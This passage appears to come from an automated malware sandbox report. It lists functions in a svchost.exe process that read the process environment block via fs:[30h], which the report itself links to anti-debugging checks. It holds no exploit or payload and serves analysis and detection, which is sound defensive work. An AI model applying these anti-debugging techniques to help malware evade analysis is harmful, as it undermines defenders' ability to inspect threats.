          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350625D mov eax, dword ptr fs:[00000030h]1_2_0350625D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A250 mov eax, dword ptr fs:[00000030h]1_2_0342A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436259 mov eax, dword ptr fs:[00000030h]1_2_03436259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA250 mov eax, dword ptr fs:[00000030h]1_2_034EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA250 mov eax, dword ptr fs:[00000030h]1_2_034EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434260 mov eax, dword ptr fs:[00000030h]1_2_03434260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434260 mov eax, dword ptr fs:[00000030h]1_2_03434260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434260 mov eax, dword ptr fs:[00000030h]1_2_03434260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342826B mov eax, dword ptr fs:[00000030h]1_2_0342826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342823B mov eax, dword ptr fs:[00000030h]1_2_0342823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035062D6 mov eax, dword ptr fs:[00000030h]1_2_035062D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h]1_2_034402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h]1_2_034402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h]1_2_034402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E284 mov eax, dword ptr fs:[00000030h]1_2_0346E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E284 mov eax, dword ptr fs:[00000030h]1_2_0346E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h]1_2_034B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h]1_2_034B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h]1_2_034B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402A0 mov eax, dword ptr fs:[00000030h]1_2_034402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402A0 mov eax, dword ptr fs:[00000030h]1_2_034402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov ecx, dword ptr fs:[00000030h]1_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov ecx, dword ptr fs:[00000030h]1_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C156 mov eax, dword ptr fs:[00000030h]1_2_0342C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C8158 mov eax, dword ptr fs:[00000030h]1_2_034C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436154 mov eax, dword ptr fs:[00000030h]1_2_03436154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436154 mov eax, dword ptr fs:[00000030h]1_2_03436154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504164 mov eax, dword ptr fs:[00000030h]1_2_03504164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504164 mov eax, dword ptr fs:[00000030h]1_2_03504164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov ecx, dword ptr fs:[00000030h]1_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]1_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]1_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]1_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F0115 mov eax, dword ptr fs:[00000030h]1_2_034F0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460124 mov eax, dword ptr fs:[00000030h]1_2_03460124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F61C3 mov eax, dword ptr fs:[00000030h]1_2_034F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F61C3 mov eax, dword ptr fs:[00000030h]1_2_034F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035061E5 mov eax, dword ptr fs:[00000030h]1_2_035061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034601F8 mov eax, dword ptr fs:[00000030h]1_2_034601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03470185 mov eax, dword ptr fs:[00000030h]1_2_03470185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EC188 mov eax, dword ptr fs:[00000030h]1_2_034EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EC188 mov eax, dword ptr fs:[00000030h]1_2_034EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4180 mov eax, dword ptr fs:[00000030h]1_2_034D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4180 mov eax, dword ptr fs:[00000030h]1_2_034D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h]1_2_0342A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h]1_2_0342A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h]1_2_0342A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432050 mov eax, dword ptr fs:[00000030h]1_2_03432050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6050 mov eax, dword ptr fs:[00000030h]1_2_034B6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345C073 mov eax, dword ptr fs:[00000030h]1_2_0345C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4000 mov ecx, dword ptr fs:[00000030h]1_2_034B4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A020 mov eax, dword ptr fs:[00000030h]1_2_0342A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C020 mov eax, dword ptr fs:[00000030h]1_2_0342C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6030 mov eax, dword ptr fs:[00000030h]1_2_034C6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B20DE mov eax, dword ptr fs:[00000030h]1_2_034B20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0342A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034380E9 mov eax, dword ptr fs:[00000030h]1_2_034380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B60E0 mov eax, dword ptr fs:[00000030h]1_2_034B60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C0F0 mov eax, dword ptr fs:[00000030h]1_2_0342C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034720F0 mov ecx, dword ptr fs:[00000030h]1_2_034720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343208A mov eax, dword ptr fs:[00000030h]1_2_0343208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034280A0 mov eax, dword ptr fs:[00000030h]1_2_034280A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C80A8 mov eax, dword ptr fs:[00000030h]1_2_034C80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F60B8 mov eax, dword ptr fs:[00000030h]1_2_034F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F60B8 mov ecx, dword ptr fs:[00000030h]1_2_034F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346674D mov esi, dword ptr fs:[00000030h]1_2_0346674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346674D mov eax, dword ptr fs:[00000030h]1_2_0346674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346674D mov eax, dword ptr fs:[00000030h]1_2_0346674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430750 mov eax, dword ptr fs:[00000030h]1_2_03430750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE75D mov eax, dword ptr fs:[00000030h]1_2_034BE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472750 mov eax, dword ptr fs:[00000030h]1_2_03472750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472750 mov eax, dword ptr fs:[00000030h]1_2_03472750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4755 mov eax, dword ptr fs:[00000030h]1_2_034B4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438770 mov eax, dword ptr fs:[00000030h]1_2_03438770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C700 mov eax, dword ptr fs:[00000030h]1_2_0346C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430710 mov eax, dword ptr fs:[00000030h]1_2_03430710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460710 mov eax, dword ptr fs:[00000030h]1_2_03460710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C720 mov eax, dword ptr fs:[00000030h]1_2_0346C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C720 mov eax, dword ptr fs:[00000030h]1_2_0346C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346273C mov eax, dword ptr fs:[00000030h]1_2_0346273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346273C mov ecx, dword ptr fs:[00000030h]1_2_0346273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346273C mov eax, dword ptr fs:[00000030h]1_2_0346273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AC730 mov eax, dword ptr fs:[00000030h]1_2_034AC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343C7C0 mov eax, dword ptr fs:[00000030h]1_2_0343C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B07C3 mov eax, dword ptr fs:[00000030h]1_2_034B07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]1_2_034527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]1_2_034527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]1_2_034527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE7E1 mov eax, dword ptr fs:[00000030h]1_2_034BE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034347FB mov eax, dword ptr fs:[00000030h]1_2_034347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034347FB mov eax, dword ptr fs:[00000030h]1_2_034347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D678E mov eax, dword ptr fs:[00000030h]1_2_034D678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034307AF mov eax, dword ptr fs:[00000030h]1_2_034307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E47A0 mov eax, dword ptr fs:[00000030h]1_2_034E47A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344C640 mov eax, dword ptr fs:[00000030h]1_2_0344C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F866E mov eax, dword ptr fs:[00000030h]1_2_034F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F866E mov eax, dword ptr fs:[00000030h]1_2_034F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A660 mov eax, dword ptr fs:[00000030h]1_2_0346A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A660 mov eax, dword ptr fs:[00000030h]1_2_0346A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03462674 mov eax, dword ptr fs:[00000030h]1_2_03462674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE609 mov eax, dword ptr fs:[00000030h]1_2_034AE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472619 mov eax, dword ptr fs:[00000030h]1_2_03472619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E627 mov eax, dword ptr fs:[00000030h]1_2_0344E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03466620 mov eax, dword ptr fs:[00000030h]1_2_03466620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03468620 mov eax, dword ptr fs:[00000030h]1_2_03468620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343262C mov eax, dword ptr fs:[00000030h]1_2_0343262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0346A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A6C7 mov eax, dword ptr fs:[00000030h]1_2_0346A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B06F1 mov eax, dword ptr fs:[00000030h]1_2_034B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B06F1 mov eax, dword ptr fs:[00000030h]1_2_034B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434690 mov eax, dword ptr fs:[00000030h]1_2_03434690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434690 mov eax, dword ptr fs:[00000030h]1_2_03434690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C6A6 mov eax, dword ptr fs:[00000030h]1_2_0346C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034666B0 mov eax, dword ptr fs:[00000030h]1_2_034666B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438550 mov eax, dword ptr fs:[00000030h]1_2_03438550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438550 mov eax, dword ptr fs:[00000030h]1_2_03438550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]1_2_0346656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]1_2_0346656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]1_2_0346656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6500 mov eax, dword ptr fs:[00000030h]1_2_034C6500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exe Code function: reads of fs:[00000030h] (the PEB pointer of a 32-bit process, the usual first step of BeingDebugged / NtGlobalFlag checks), listed per function with the destination register and the number of occurrences
          1_2_03504500 mov eax, dword ptr fs:[00000030h] (4x)
          1_2_03440535 mov eax, dword ptr fs:[00000030h] (6x)
          1_2_0345E53E mov eax, dword ptr fs:[00000030h] (5x)
          1_2_0346E5CF mov eax, dword ptr fs:[00000030h] (2x)
          1_2_034365D0 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_0346A5D0 mov eax, dword ptr fs:[00000030h] (2x)
          1_2_0345E5E7 mov eax, dword ptr fs:[00000030h] (8x)
          1_2_034325E0 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_0346C5ED mov eax, dword ptr fs:[00000030h] (2x)
          1_2_03432582 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_03432582 mov ecx, dword ptr fs:[00000030h] (1x)
          1_2_03464588 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_0346E59C mov eax, dword ptr fs:[00000030h] (1x)
          1_2_034B05A7 mov eax, dword ptr fs:[00000030h] (3x)
          1_2_034545B1 mov eax, dword ptr fs:[00000030h] (2x)
          1_2_0346E443 mov eax, dword ptr fs:[00000030h] (8x)
          1_2_034EA456 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_0342645D mov eax, dword ptr fs:[00000030h] (1x)
          1_2_0345245A mov eax, dword ptr fs:[00000030h] (1x)
          1_2_034BC460 mov ecx, dword ptr fs:[00000030h] (1x)
          1_2_0345A470 mov eax, dword ptr fs:[00000030h] (3x)
          1_2_0342E420 mov eax, dword ptr fs:[00000030h] (3x)
          1_2_0342C427 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_034B6420 mov eax, dword ptr fs:[00000030h] (7x)
          1_2_034304E5 mov ecx, dword ptr fs:[00000030h] (1x)
          1_2_034EA49A mov eax, dword ptr fs:[00000030h] (1x)
          1_2_034364AB mov eax, dword ptr fs:[00000030h] (1x)
          1_2_034644B0 mov ecx, dword ptr fs:[00000030h] (1x)
          1_2_034BA4B0 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_034E4B4B mov eax, dword ptr fs:[00000030h] (2x)
          1_2_03502B57 mov eax, dword ptr fs:[00000030h] (4x)
          1_2_034C6B40 mov eax, dword ptr fs:[00000030h] (2x)
          1_2_034FAB40 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_034D8B42 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_03428B50 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_034DEB50 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_0342CB7E mov eax, dword ptr fs:[00000030h] (1x)
          1_2_03504B00 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_034AEB1D mov eax, dword ptr fs:[00000030h] (9x)
          1_2_0345EB20 mov eax, dword ptr fs:[00000030h] (2x)
          1_2_034F8B28 mov eax, dword ptr fs:[00000030h] (2x)
          1_2_03450BCB mov eax, dword ptr fs:[00000030h] (3x)
